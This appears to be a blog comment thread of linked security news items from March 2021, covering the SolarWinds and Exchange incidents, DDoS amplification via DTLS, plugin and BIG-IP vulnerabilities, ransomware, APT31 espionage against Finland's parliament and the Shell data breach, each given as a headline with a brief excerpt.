https://www.bleepingcomputer.com/news/security/cisa-releases-new-solarwinds-malicious-activity-detection-tool/
The Cybersecurity and Infrastructure Security Agency (CISA) has
released a new tool to detect post-compromise malicious activity
associated with the SolarWinds hackers in on-premises enterprise
environments. CISA Hunt and Incident Response Program (CHIRP), the new
forensics collection tool, is a Python-based tool that helps detect
SolarWinds malicious activity IOCs on Windows operating systems. Also:
https://www.zdnet.com/article/burnt-by-solarwinds-attack-us-releases-tool-for-post-compromise-detection/
Also:
https://us-cert.cisa.gov/ncas/current-activity/2021/03/18/using-chirp-detect-post-compromise-threat-activity-premises
Tomi Engdahl says:
Statement on Microsoft Exchange vulnerabilities
https://www.enisa.europa.eu/news/enisa-news/statement-on-microsoft-exchange-vulnerabilities
The EU Agency for Cybersecurity (ENISA) has provided a statement with
an assessment and advice on Microsoft Exchange vulnerabilities.
Microsoft Defender Antivirus now automatically mitigates Exchange
Server vulnerabilities
https://www.zdnet.com/article/microsoft-defender-antivirus-now-patches-exchange-server-vulnerabilities/
Mitigation fixes will be applied automatically in a renewed effort by
Microsoft to contain security incidents caused by the bugs.
Tomi Engdahl says:
Bitcoin extortion messages continue
https://poliisi.fi/-/bitcoin-kiristysviestit-jatkuvat
The Häme Police Department has again learned of dozens of extortion
messages sent to private individuals, demanding that the recipient pay
1,450 euros' worth of Bitcoin to the extortionist's wallet or else
sensitive information about them will be spread. Also:
https://www.is.fi/digitoday/tietoturva/art-2000007869545.html
Tomi Engdahl says:
Microsoft Releases Exchange On-premises Mitigation Tool
https://us-cert.cisa.gov/ncas/current-activity/2021/03/16/microsoft-releases-exchange-premises-mitigation-tool
Microsoft has released the Exchange On-premises Mitigation Tool
(EOMT.ps1) that can automate portions of both the detection and
patching process. Microsoft stated the following along with the
release: “[the tool is intended] to help customers who do not have
dedicated security or IT teams to apply these security updates.
Tomi Engdahl says:
Polish State Websites Hacked and Used to Spread False Info
https://www.securityweek.com/polish-state-websites-hacked-and-used-spread-false-info
Two Polish government websites were hacked Wednesday and used briefly
to spread false information about a non-existent radioactive threat,
in what a Polish government official said had the hallmarks of a
Russian cyberattack.
Tomi Engdahl says:
~4,300 publicly reachable servers are posing a new DDoS hazard to the
Internet
https://arstechnica.com/gadgets/2021/03/mainstream-ddosers-are-abusing-d-tls-servers-to-up-the-potency-of-attacks/
DDoS-for-hire services adopt new technique that amplifies attacks 37
fold. DDoS mitigation provider Netscout said on Wednesday that it has
observed DDoS-for-hire services adopting a new amplification vector.
The vector is the Datagram Transport Layer Security, or D/TLS, which
(as its name suggests) is essentially the Transport Layer Security for
UDP data packets. The biggest D/TLS-based attacks Netscout has
observed delivered about 45Gbps of traffic. The people responsible for
the attack combined it with other amplification vectors to achieve a
combined size of about 207Gbps.
Tomi Engdahl says:
Necro upgrades again, using Tor + dynamic domain DGA and aiming at
both Windows & Linux
https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/
Tomi Engdahl says:
Flaws in Two Popular WordPress Plugins Affect Over 7 Million Websites
https://thehackernews.com/2021/03/flaws-in-two-popular-wordpress-plugins.html
Researchers have disclosed vulnerabilities in multiple WordPress
plugins that, if successfully exploited, could allow an attacker to
run arbitrary code and take over a website in certain scenarios. The
flaws were uncovered in Elementor, a website builder plugin used on
more than seven million sites, and WP Super Cache, a tool used to
serve cached pages of a WordPress site.
Tomi Engdahl says:
Hackers are exploiting a server vulnerability with a severity of 9.8
out of 10
https://arstechnica.com/gadgets/2021/03/to-security-pros-dread-another-critical-server-vulnerability-is-under-exploit/
As if the mass-exploitation of Exchange servers wasn’t enough, now
there’s BIG-IP. Last week, F5 disclosed and patched critical BIG-IP
vulnerabilities that allow hackers to gain complete control of a
server. Despite a severity rating of 9.8 out of 10, the security flaws
got overshadowed by a different set of critical vulnerabilities
Microsoft disclosed and patched in Exchange server a week earlier.
Also:
https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html
Tomi Engdahl says:
The Week in Ransomware – March 19th 2021 – Highest ransom ever!
https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-march-19th-2021-highest-ransom-ever/
While the beginning of this week was fairly quiet, it definitely ended
with a bang as news came out of the largest ransom demand yet.
Tomi Engdahl says:
Russian Man Pleads Guilty to Role in Attempt to Plant Malware on Tesla Systems
https://www.securityweek.com/russian-man-pleads-guilty-role-attempt-plant-malware-tesla-systems
Tomi Engdahl says:
Finland IDs Hackers Linked to Parliament Spying Attack
https://www.securityweek.com/finland-ids-hackers-linked-parliament-spying-attack
Finland’s domestic security agency said Thursday that the cybergroup APT31, which is generally linked to the Chinese government, was likely behind a cyberspying attack on the information systems of the Nordic country’s parliament.
The Finnish Security and Intelligence Service, known by the abbreviation Supo, said it had “identified a cyber espionage operation targeted in 2020 against parliament with the aim of intruding into parliament’s IT systems.”
The agency added that “according to Supo intelligence, APT31 was responsible for the attack”. It didn’t mention China by name or the group’s alleged links to the government in Beijing. The statement was also posted in English on the agency’s Twitter account.
Finland’s National Bureau of Investigation, NBI, said late December that it had started an investigation into suspected gross hacking and espionage attacks on the information systems of Eduskunta, the Finnish legislature. Among other things, some lawmakers’ email accounts were compromised.
Parliament has since upgraded the systems’ security features.
Tomi Engdahl says:
DDoS booters now abuse DTLS servers to amplify attacks
https://www.bleepingcomputer.com/news/security/ddos-booters-now-abuse-dtls-servers-to-amplify-attacks/
DDoS-for-hire services are now actively abusing misconfigured or
out-of-date Datagram Transport Layer Security (D/TLS) servers to
amplify Distributed Denial of Service (DDoS) attacks.
Tomi Engdahl says:
“Hack everybody you can”: What to know about the massive Microsoft Exchange breach
https://www.cbsnews.com/news/microsoft-exchange-server-hack-what-to-know/
Tomi Engdahl says:
Cybersecurity researchers on Sunday disclosed multiple critical
vulnerabilities in remote student monitoring software Netop Vision Pro
that a malicious attacker could abuse to execute arbitrary code and
take over Windows computers
https://thehackernews.com/2021/03/popular-netops-remote-learning-software.html
“These findings allow for elevation of privileges and ultimately
remote code execution which could be used by a malicious attacker
within the same network to gain full control over students’ computers,”
the McAfee Labs Advanced Threat Research team said in an analysis.
Also:
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/netop-vision-pro-distance-learning-software-is-20-20-in-hindsight/
Tomi Engdahl says:
Energy giant Shell discloses data breach after Accellion hack
https://www.bleepingcomputer.com/news/security/energy-giant-shell-discloses-data-breach-after-accellion-hack/
Energy giant Shell has disclosed a data breach after attackers
compromised the company’s secure file-sharing system powered by
Accellion’s File Transfer Appliance (FTA).